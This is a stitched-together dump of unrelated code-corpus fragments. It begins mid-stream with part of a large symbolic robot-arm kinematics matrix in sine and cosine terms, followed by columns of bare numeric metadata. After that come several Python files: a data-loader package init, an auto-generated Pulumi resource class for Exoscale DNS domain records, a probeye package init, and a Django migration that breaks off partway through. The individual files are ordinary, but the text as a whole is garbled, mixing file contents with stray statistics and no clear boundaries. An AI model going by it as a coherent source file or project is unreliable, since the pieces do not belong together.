(-0.264662997130313*s(q[0, 0]) - 0.264662997130313*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]), (-0.3683*((-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*s(q[4, 0]) + 0.3683*((-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[4, 0]))*s(q[5, 0]) - (0.01*(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - 0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*s(q[4, 0]) + (0.01*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + 0.01*(0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*c(q[4, 0]), (0.3683*((-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*c(q[3, 0]) - (-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) + 0.3683*((-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*s(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[2, 0]))*s(q[4, 0]))*c(q[5, 0]) - (0.3683*(-(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[1, 0])*c(q[2, 0]) + (0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*s(q[2, 0]))*s(q[3, 0]) + 0.3683*(-0.707106781186548*s(q[0, 0]) - 0.707106781186548*c(q[0, 0]))*c(q[1, 0])*c(q[3, 0]))*s(q[5, 0]), 0], [0, (0.3683*(s(q[1, 0])*c(q[2, 0])*c(q[3, 0]) + s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) - 0.3683*s(q[1, 0])*s(q[2, 0])*s(q[4, 0]))*s(q[5, 0]) + (0.3683*s(q[1, 0])*s(q[3, 0])*c(q[2, 0]) - 0.3683*c(q[1, 0])*c(q[3, 0]))*c(q[5, 0]) + (0.01*s(q[1, 0])*c(q[2, 0])*c(q[3, 0]) + 0.01*s(q[3, 0])*c(q[1, 0]))*c(q[4, 0]) - 0.01*s(q[1, 0])*s(q[2, 0])*s(q[4, 0]) + 0.37429*s(q[1, 0])*s(q[3, 0])*c(q[2, 0]) + 0.069*s(q[1, 0])*c(q[2, 0]) - 0.37429*c(q[1, 0])*c(q[3, 0]) - 0.36435*c(q[1, 0]), (0.3683*s(q[2, 0])*c(q[1, 0])*c(q[3, 0])*c(q[4, 0]) + 0.3683*s(q[4, 0])*c(q[1, 0])*c(q[2, 0]))*s(q[5, 0]) + 0.3683*s(q[2, 0])*s(q[3, 0])*c(q[1, 0])*c(q[5, 0]) + 0.37429*s(q[2, 0])*s(q[3, 0])*c(q[1, 0]) + 0.01*s(q[2, 0])*c(q[1, 0])*c(q[3, 0])*c(q[4, 0]) + 0.069*s(q[2, 0])*c(q[1, 0]) + 0.01*s(q[4, 0])*c(q[1, 0])*c(q[2, 0]), (0.3683*s(q[1, 0])*s(q[3, 0]) - 0.3683*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[5, 0]) + (0.01*s(q[1, 0])*c(q[3, 0]) + 0.01*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]))*c(q[4, 0]) + 0.3683*(s(q[1, 0])*c(q[3, 0]) + s(q[3, 0])*c(q[1, 0])*c(q[2, 0]))*s(q[5, 0])*c(q[4, 0]) + 0.37429*s(q[1, 0])*s(q[3, 0]) - 0.37429*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]), (-0.3683*(s(q[1, 0])*s(q[3, 0]) - c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*s(q[4, 0]) + 0.3683*s(q[2, 0])*c(q[1, 0])*c(q[4, 0]))*s(q[5, 0]) - (0.01*s(q[1, 0])*s(q[3, 0]) - 0.01*c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*s(q[4, 0]) + 0.01*s(q[2, 0])*c(q[1, 0])*c(q[4, 0]), (0.3683*(s(q[1, 0])*s(q[3, 0]) - c(q[1, 0])*c(q[2, 0])*c(q[3, 0]))*c(q[4, 0]) + 0.3683*s(q[2, 0])*s(q[4, 0])*c(q[1, 0]))*c(q[5, 0]) - (-0.3683*s(q[1, 0])*c(q[3, 0]) - 0.3683*s(q[3, 0])*c(q[1, 0])*c(q[2, 0]))*s(q[5, 0]), 0]])
| 1,444.423077
| 16,008
| 0.539582
| 9,089
| 37,555
| 2.228408
| 0.004181
| 0.164609
| 0.107831
| 0.074652
| 0.994273
| 0.992199
| 0.991853
| 0.991607
| 0.990669
| 0.989187
| 0
| 0.485682
| 0.093356
| 37,555
| 25
| 16,009
| 1,502.2
| 0.109166
| 0
| 0
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 12
|
2c2b5b37d7b20d9361797e0102202f6f3ce2055d
| 307
|
py
|
Python
|
data/__init__.py
|
chilung/VisDA1
|
d5bafb7c6048f56483d2b03ae7040eee7a60af71
|
[
"MIT"
] | 60
|
2020-08-05T10:26:06.000Z
|
2022-01-13T12:46:06.000Z
|
data/__init__.py
|
chilung/VisDA1
|
d5bafb7c6048f56483d2b03ae7040eee7a60af71
|
[
"MIT"
] | 5
|
2020-08-06T04:55:17.000Z
|
2020-10-12T03:05:31.000Z
|
data/__init__.py
|
chilung/VisDA1
|
d5bafb7c6048f56483d2b03ae7040eee7a60af71
|
[
"MIT"
] | 10
|
2020-08-06T15:57:56.000Z
|
2021-02-02T08:42:21.000Z
|
# encoding: utf-8
"""
@author: sherlock
@contact: sherlockliao01@gmail.com
"""
from .build import make_val_data_loader, make_test_data_loader, make_camstyle_data_loader
from .build import make_camstyle_target_unsupdata_loader, make_camera_data_loader
from .build import make_camstyle_alltrain_data_loader
| 30.7
| 89
| 0.846906
| 44
| 307
| 5.454545
| 0.5
| 0.208333
| 0.1875
| 0.2375
| 0.308333
| 0.308333
| 0.308333
| 0
| 0
| 0
| 0
| 0.010676
| 0.084691
| 307
| 9
| 90
| 34.111111
| 0.843416
| 0.228013
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
25783d1cc1602101a0e45976ac3b544b7b833e11
| 19,100
|
py
|
Python
|
sdk/python/pulumi_exoscale/domain_record.py
|
secustor/pulumi-exoscale
|
c805e4bbf896526e46ed168bc96c9c0a3f82adf8
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_exoscale/domain_record.py
|
secustor/pulumi-exoscale
|
c805e4bbf896526e46ed168bc96c9c0a3f82adf8
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_exoscale/domain_record.py
|
secustor/pulumi-exoscale
|
c805e4bbf896526e46ed168bc96c9c0a3f82adf8
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['DomainRecordArgs', 'DomainRecord']
@pulumi.input_type
class DomainRecordArgs:
def __init__(__self__, *,
content: pulumi.Input[str],
domain: pulumi.Input[str],
record_type: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None,
prio: Optional[pulumi.Input[int]] = None,
ttl: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a DomainRecord resource.
:param pulumi.Input[str] content: The value of the domain record.
:param pulumi.Input[str] domain: The name of the [`Domain`][r-domain] to create the record into.
:param pulumi.Input[str] record_type: The type of the domain record. Supported values are: `A`, `AAAA`, `ALIAS`, `CAA`, `CNAME`, `HINFO`, `MX`, `NAPTR`, `NS`, `POOL`, `SPF`, `SRV`, `SSHFP`, `TXT`, `URL`.
:param pulumi.Input[str] name: The name of the domain record; leave blank (`""`) to create a root record (similar to using `@` in a DNS zone file).
:param pulumi.Input[int] prio: The priority of the DNS domain record (for types that support it).
:param pulumi.Input[int] ttl: The [Time To Live][ttl] of the domain record.
"""
pulumi.set(__self__, "content", content)
pulumi.set(__self__, "domain", domain)
pulumi.set(__self__, "record_type", record_type)
if name is not None:
pulumi.set(__self__, "name", name)
if prio is not None:
pulumi.set(__self__, "prio", prio)
if ttl is not None:
pulumi.set(__self__, "ttl", ttl)
@property
@pulumi.getter
def content(self) -> pulumi.Input[str]:
"""
The value of the domain record.
"""
return pulumi.get(self, "content")
@content.setter
def content(self, value: pulumi.Input[str]):
pulumi.set(self, "content", value)
@property
@pulumi.getter
def domain(self) -> pulumi.Input[str]:
"""
The name of the [`Domain`][r-domain] to create the record into.
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: pulumi.Input[str]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter(name="recordType")
def record_type(self) -> pulumi.Input[str]:
"""
The type of the domain record. Supported values are: `A`, `AAAA`, `ALIAS`, `CAA`, `CNAME`, `HINFO`, `MX`, `NAPTR`, `NS`, `POOL`, `SPF`, `SRV`, `SSHFP`, `TXT`, `URL`.
"""
return pulumi.get(self, "record_type")
@record_type.setter
def record_type(self, value: pulumi.Input[str]):
pulumi.set(self, "record_type", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the domain record; leave blank (`""`) to create a root record (similar to using `@` in a DNS zone file).
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def prio(self) -> Optional[pulumi.Input[int]]:
"""
The priority of the DNS domain record (for types that support it).
"""
return pulumi.get(self, "prio")
@prio.setter
def prio(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "prio", value)
@property
@pulumi.getter
def ttl(self) -> Optional[pulumi.Input[int]]:
"""
The [Time To Live][ttl] of the domain record.
"""
return pulumi.get(self, "ttl")
@ttl.setter
def ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ttl", value)
@pulumi.input_type
class _DomainRecordState:
def __init__(__self__, *,
content: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
hostname: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
prio: Optional[pulumi.Input[int]] = None,
record_type: Optional[pulumi.Input[str]] = None,
ttl: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering DomainRecord resources.
:param pulumi.Input[str] content: The value of the domain record.
:param pulumi.Input[str] domain: The name of the [`Domain`][r-domain] to create the record into.
:param pulumi.Input[str] hostname: The DNS domain record's *Fully Qualified Domain Name* (FQDN), useful for linking `A` records into `CNAME`.
:param pulumi.Input[str] name: The name of the domain record; leave blank (`""`) to create a root record (similar to using `@` in a DNS zone file).
:param pulumi.Input[int] prio: The priority of the DNS domain record (for types that support it).
:param pulumi.Input[str] record_type: The type of the domain record. Supported values are: `A`, `AAAA`, `ALIAS`, `CAA`, `CNAME`, `HINFO`, `MX`, `NAPTR`, `NS`, `POOL`, `SPF`, `SRV`, `SSHFP`, `TXT`, `URL`.
:param pulumi.Input[int] ttl: The [Time To Live][ttl] of the domain record.
"""
if content is not None:
pulumi.set(__self__, "content", content)
if domain is not None:
pulumi.set(__self__, "domain", domain)
if hostname is not None:
pulumi.set(__self__, "hostname", hostname)
if name is not None:
pulumi.set(__self__, "name", name)
if prio is not None:
pulumi.set(__self__, "prio", prio)
if record_type is not None:
pulumi.set(__self__, "record_type", record_type)
if ttl is not None:
pulumi.set(__self__, "ttl", ttl)
@property
@pulumi.getter
def content(self) -> Optional[pulumi.Input[str]]:
"""
The value of the domain record.
"""
return pulumi.get(self, "content")
@content.setter
def content(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content", value)
@property
@pulumi.getter
def domain(self) -> Optional[pulumi.Input[str]]:
"""
The name of the [`Domain`][r-domain] to create the record into.
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter
def hostname(self) -> Optional[pulumi.Input[str]]:
"""
The DNS domain record's *Fully Qualified Domain Name* (FQDN), useful for linking `A` records into `CNAME`.
"""
return pulumi.get(self, "hostname")
@hostname.setter
def hostname(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "hostname", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the domain record; leave blank (`""`) to create a root record (similar to using `@` in a DNS zone file).
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def prio(self) -> Optional[pulumi.Input[int]]:
"""
The priority of the DNS domain record (for types that support it).
"""
return pulumi.get(self, "prio")
@prio.setter
def prio(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "prio", value)
@property
@pulumi.getter(name="recordType")
def record_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the domain record. Supported values are: `A`, `AAAA`, `ALIAS`, `CAA`, `CNAME`, `HINFO`, `MX`, `NAPTR`, `NS`, `POOL`, `SPF`, `SRV`, `SSHFP`, `TXT`, `URL`.
"""
return pulumi.get(self, "record_type")
@record_type.setter
def record_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "record_type", value)
@property
@pulumi.getter
def ttl(self) -> Optional[pulumi.Input[int]]:
"""
The [Time To Live][ttl] of the domain record.
"""
return pulumi.get(self, "ttl")
@ttl.setter
def ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ttl", value)
class DomainRecord(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
content: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
prio: Optional[pulumi.Input[int]] = None,
record_type: Optional[pulumi.Input[str]] = None,
ttl: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
Provides an Exoscale [DNS][dns-doc] domain record resource. This can be used to create, modify, and delete DNS domain records.
## Usage example
```python
import pulumi
import pulumi_exoscale as exoscale
example = exoscale.Domain("example")
myserver = exoscale.DomainRecord("myserver",
domain=example.id,
record_type="A",
content="1.2.3.4")
myserver_alias = exoscale.DomainRecord("myserverAlias",
domain=example.id,
record_type="CNAME",
content=myserver.hostname)
```
## Import
An existing DNS domain record can be imported as a resource by IDconsole
```sh
$ pulumi import exoscale:index/domainRecord:DomainRecord www 12480484
```
[dns-doc]https://community.exoscale.com/documentation/dns/ [r-domain]domain.html [ttl]https://en.wikipedia.org/wiki/Time_to_live
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] content: The value of the domain record.
:param pulumi.Input[str] domain: The name of the [`Domain`][r-domain] to create the record into.
:param pulumi.Input[str] name: The name of the domain record; leave blank (`""`) to create a root record (similar to using `@` in a DNS zone file).
:param pulumi.Input[int] prio: The priority of the DNS domain record (for types that support it).
:param pulumi.Input[str] record_type: The type of the domain record. Supported values are: `A`, `AAAA`, `ALIAS`, `CAA`, `CNAME`, `HINFO`, `MX`, `NAPTR`, `NS`, `POOL`, `SPF`, `SRV`, `SSHFP`, `TXT`, `URL`.
:param pulumi.Input[int] ttl: The [Time To Live][ttl] of the domain record.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DomainRecordArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides an Exoscale [DNS][dns-doc] domain record resource. This can be used to create, modify, and delete DNS domain records.
## Usage example
```python
import pulumi
import pulumi_exoscale as exoscale
example = exoscale.Domain("example")
myserver = exoscale.DomainRecord("myserver",
domain=example.id,
record_type="A",
content="1.2.3.4")
myserver_alias = exoscale.DomainRecord("myserverAlias",
domain=example.id,
record_type="CNAME",
content=myserver.hostname)
```
## Import
An existing DNS domain record can be imported as a resource by IDconsole
```sh
$ pulumi import exoscale:index/domainRecord:DomainRecord www 12480484
```
[dns-doc]https://community.exoscale.com/documentation/dns/ [r-domain]domain.html [ttl]https://en.wikipedia.org/wiki/Time_to_live
:param str resource_name: The name of the resource.
:param DomainRecordArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DomainRecordArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
content: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
prio: Optional[pulumi.Input[int]] = None,
record_type: Optional[pulumi.Input[str]] = None,
ttl: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DomainRecordArgs.__new__(DomainRecordArgs)
if content is None and not opts.urn:
raise TypeError("Missing required property 'content'")
__props__.__dict__["content"] = content
if domain is None and not opts.urn:
raise TypeError("Missing required property 'domain'")
__props__.__dict__["domain"] = domain
__props__.__dict__["name"] = name
__props__.__dict__["prio"] = prio
if record_type is None and not opts.urn:
raise TypeError("Missing required property 'record_type'")
__props__.__dict__["record_type"] = record_type
__props__.__dict__["ttl"] = ttl
__props__.__dict__["hostname"] = None
super(DomainRecord, __self__).__init__(
'exoscale:index/domainRecord:DomainRecord',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
content: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
hostname: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
prio: Optional[pulumi.Input[int]] = None,
record_type: Optional[pulumi.Input[str]] = None,
ttl: Optional[pulumi.Input[int]] = None) -> 'DomainRecord':
"""
Get an existing DomainRecord resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] content: The value of the domain record.
:param pulumi.Input[str] domain: The name of the [`Domain`][r-domain] to create the record into.
:param pulumi.Input[str] hostname: The DNS domain record's *Fully Qualified Domain Name* (FQDN), useful for linking `A` records into `CNAME`.
:param pulumi.Input[str] name: The name of the domain record; leave blank (`""`) to create a root record (similar to using `@` in a DNS zone file).
:param pulumi.Input[int] prio: The priority of the DNS domain record (for types that support it).
:param pulumi.Input[str] record_type: The type of the domain record. Supported values are: `A`, `AAAA`, `ALIAS`, `CAA`, `CNAME`, `HINFO`, `MX`, `NAPTR`, `NS`, `POOL`, `SPF`, `SRV`, `SSHFP`, `TXT`, `URL`.
:param pulumi.Input[int] ttl: The [Time To Live][ttl] of the domain record.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DomainRecordState.__new__(_DomainRecordState)
__props__.__dict__["content"] = content
__props__.__dict__["domain"] = domain
__props__.__dict__["hostname"] = hostname
__props__.__dict__["name"] = name
__props__.__dict__["prio"] = prio
__props__.__dict__["record_type"] = record_type
__props__.__dict__["ttl"] = ttl
return DomainRecord(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def content(self) -> pulumi.Output[str]:
"""
The value of the domain record.
"""
return pulumi.get(self, "content")
@property
@pulumi.getter
def domain(self) -> pulumi.Output[str]:
"""
The name of the [`Domain`][r-domain] to create the record into.
"""
return pulumi.get(self, "domain")
@property
@pulumi.getter
def hostname(self) -> pulumi.Output[str]:
"""
The DNS domain record's *Fully Qualified Domain Name* (FQDN), useful for linking `A` records into `CNAME`.
"""
return pulumi.get(self, "hostname")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the domain record; leave blank (`""`) to create a root record (similar to using `@` in a DNS zone file).
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def prio(self) -> pulumi.Output[int]:
"""
The priority of the DNS domain record (for types that support it).
"""
return pulumi.get(self, "prio")
@property
@pulumi.getter(name="recordType")
def record_type(self) -> pulumi.Output[str]:
"""
The type of the domain record. Supported values are: `A`, `AAAA`, `ALIAS`, `CAA`, `CNAME`, `HINFO`, `MX`, `NAPTR`, `NS`, `POOL`, `SPF`, `SRV`, `SSHFP`, `TXT`, `URL`.
"""
return pulumi.get(self, "record_type")
@property
@pulumi.getter
def ttl(self) -> pulumi.Output[int]:
"""
The [Time To Live][ttl] of the domain record.
"""
return pulumi.get(self, "ttl")
| 40.811966
| 211
| 0.60445
| 2,315
| 19,100
| 4.834557
| 0.086393
| 0.08649
| 0.075054
| 0.060936
| 0.839796
| 0.811294
| 0.782613
| 0.766798
| 0.750268
| 0.741333
| 0
| 0.001794
| 0.270209
| 19,100
| 467
| 212
| 40.899358
| 0.801134
| 0.381728
| 0
| 0.685259
| 1
| 0
| 0.069426
| 0.003763
| 0
| 0
| 0
| 0
| 0
| 1
| 0.159363
| false
| 0.003984
| 0.01992
| 0
| 0.2749
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
25d083765e5ddf525d51287c630ee062f7dce71f
| 237
|
py
|
Python
|
probeye/definition/__init__.py
|
SMattfeldt/probeye
|
3a1e236f1e389f4e775a1413a4cf173f39ab2f12
|
[
"MIT"
] | null | null | null |
probeye/definition/__init__.py
|
SMattfeldt/probeye
|
3a1e236f1e389f4e775a1413a4cf173f39ab2f12
|
[
"MIT"
] | null | null | null |
probeye/definition/__init__.py
|
SMattfeldt/probeye
|
3a1e236f1e389f4e775a1413a4cf173f39ab2f12
|
[
"MIT"
] | null | null | null |
# module imports
from probeye.definition import inference_problem
from probeye.definition import forward_model
from probeye.definition import likelihood_model
from probeye.definition import parameter
from probeye.definition import prior
| 33.857143
| 48
| 0.877637
| 30
| 237
| 6.833333
| 0.433333
| 0.268293
| 0.512195
| 0.658537
| 0.312195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097046
| 237
| 6
| 49
| 39.5
| 0.957944
| 0.059072
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d300fdc8d8fd865ba7fa00aaed71333ebee485e2
| 11,028
|
py
|
Python
|
plataforma/migrations/0001_initial.py
|
bodedev/prospera
|
4ce39b0ee4ae32b3584157f23a5f94f340892980
|
[
"MIT"
] | 3
|
2017-05-11T17:48:41.000Z
|
2017-10-04T01:53:35.000Z
|
plataforma/migrations/0001_initial.py
|
bodedev/prospera
|
4ce39b0ee4ae32b3584157f23a5f94f340892980
|
[
"MIT"
] | null | null | null |
plataforma/migrations/0001_initial.py
|
bodedev/prospera
|
4ce39b0ee4ae32b3584157f23a5f94f340892980
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-05-18 14:02
from __future__ import unicode_literals
import autoslug.fields
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='HistoricalNodo',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created', models.DateTimeField(blank=True, editable=False)),
('updated', models.DateTimeField(blank=True, editable=False)),
('excluido', models.BooleanField(db_index=True, default=False)),
('excluido_em', models.DateTimeField(blank=True, null=True)),
('quem_sou', models.TextField(blank=True, max_length=500, null=True, verbose_name='Quem Sou?')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('excluido_por', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('user', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical nodo',
},
),
migrations.CreateModel(
name='HistoricalNodos',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created', models.DateTimeField(blank=True, editable=False)),
('updated', models.DateTimeField(blank=True, editable=False)),
('excluido', models.BooleanField(db_index=True, default=False)),
('excluido_em', models.DateTimeField(blank=True, null=True)),
('nome', models.CharField(max_length=50, verbose_name='Nome')),
('slug', autoslug.fields.AutoSlugField(editable=False, populate_from='nome')),
('imagem_listagem', models.TextField(blank=True, max_length=100, null=True)),
('imagem_detalhes', models.TextField(blank=True, max_length=100, null=True)),
('titulo', models.CharField(blank=True, max_length=50, null=True, verbose_name='T\xedtulo')),
('descricao', models.TextField(blank=True, null=True, verbose_name='Descri\xe7\xe3o')),
('contato_facebook', models.URLField(blank=True, null=True, verbose_name='Facebook')),
('contato_whatsapp', models.URLField(blank=True, null=True, verbose_name='WhatsApp')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('excluido_por', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical nodos',
},
),
migrations.CreateModel(
name='HistoricalObjeto',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created', models.DateTimeField(blank=True, editable=False)),
('updated', models.DateTimeField(blank=True, editable=False)),
('excluido', models.BooleanField(db_index=True, default=False)),
('excluido_em', models.DateTimeField(blank=True, null=True)),
('nome', models.CharField(blank=True, max_length=50, null=True, verbose_name='Nome')),
('slug', autoslug.fields.AutoSlugField(editable=False, populate_from='nome')),
('imagem_listagem', models.TextField(blank=True, max_length=100, null=True)),
('imagem_detalhes', models.TextField(blank=True, max_length=100, null=True)),
('titulo', models.CharField(blank=True, max_length=50, null=True, verbose_name='T\xedtulo')),
('descricao', models.TextField(blank=True, null=True, verbose_name='Descri\xe7\xe3o')),
('contato_facebook', models.URLField(blank=True, null=True, verbose_name='Facebook')),
('contato_whatsapp', models.URLField(blank=True, null=True, verbose_name='WhatsApp')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
